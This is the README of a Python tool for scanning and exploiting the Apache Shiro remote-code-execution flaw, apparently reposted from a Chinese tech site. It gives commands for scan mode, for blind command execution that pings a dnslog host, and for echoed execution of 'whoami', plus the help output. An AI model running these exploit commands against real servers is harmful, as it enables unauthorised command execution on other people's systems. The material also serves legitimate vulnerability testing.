一个简单的Shiro RCE检测和利用脚本

0x01 工具介绍

一个简单的Shiro RCE检测和利用脚本。

0x02 安装与使用

1、安装需要的包

pip install -r requirements.txt

2、检查该漏洞

python ShiroRceTool.py -m scan -u "http://example.com"

3、执行命令 (不回显) 

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

4、执行命令（尝试回显）

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

5、获取帮助 - Get help

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

　　审核编辑：汤梓红